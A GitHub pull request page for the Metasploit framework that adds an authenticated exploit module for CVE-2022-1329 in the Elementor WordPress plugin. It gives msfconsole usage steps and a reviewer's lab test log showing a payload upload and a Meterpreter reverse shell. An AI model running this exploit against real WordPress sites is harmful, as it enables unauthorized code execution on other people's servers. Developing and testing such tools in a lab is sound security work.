Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

cve-2022-1329 (wordpress elementor plugin) #17099

Merged
merged 2 commits into from
Oct 3, 2022
Merged

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Oct 2, 2022

fixes #16501

This PR adds a new authenticated exploit module against 3 versions of Elementor, a plugin for Wordpress. Any user account can use this exploit, it was rated a 9.9 CVSS score.

Verification

List the steps needed to make sure this thing works

  • Install the plugin, no configuration is required, just hit skip.
  • Start msfconsole
  • Do: use exploits/multi/http/wp_plugin_elementor_auth_upload_rce
  • Do: set username [username]
  • Do: set password [password]
  • Do: set rhosts [ip]
  • Do: run
  • You should get a shell.
  • check docs

@jheysel-r7 jheysel-r7 self-assigned this Oct 3, 2022
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @h00die for the great addition. Testing checked out with no issues. Just noticed one potential improvement other than that looks good to go. 🚀

msf6 exploit(multi/http/wp_plugin_elementor_auth_upload_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Looking for nonce
[+] Nonce: 71e2543c26
[*] Uploading upgrade payload and activating...
[*] Payload file name: elementor-pro.php
[*] Sending stage (39927 bytes) to 172.16.199.1
[+] Deleted ../wp-content/plugins/elementor-pro
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:52708) at 2022-10-03 12:39:55 -0400
[+] Payload Uploaded Successfully

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 2dc352e73855
OS          : Linux 2dc352e73855 5.10.47-linuxkit #1 SMP Sat Jul 3 21:51:47 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter >

@h00die
Copy link
Contributor Author

h00die commented Oct 3, 2022

didn't know about that! converted, re-tested, and left comments in the code for future me to easily convert to the new format. Thanks @jheysel-r7

@jheysel-r7 jheysel-r7 merged commit edc0c62 into rapid7:master Oct 3, 2022
@jheysel-r7
Copy link
Contributor

Release Notes

This PR adds a new authenticated exploit module against 3 versions of Elementor, a plugin for Wordpress. Any user account can use this exploit, it was rated a 9.9 CVSS score and was assigned: CVE-2022-1329

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 3, 2022
@h00die h00die deleted the elementor branch October 3, 2022 21:19
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs hacktoberfest-accepted module rn-modules release notes for new or majorly enhanced modules
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

CVE-2022-1329 -> wordpress elementor authenticated rce
2 participants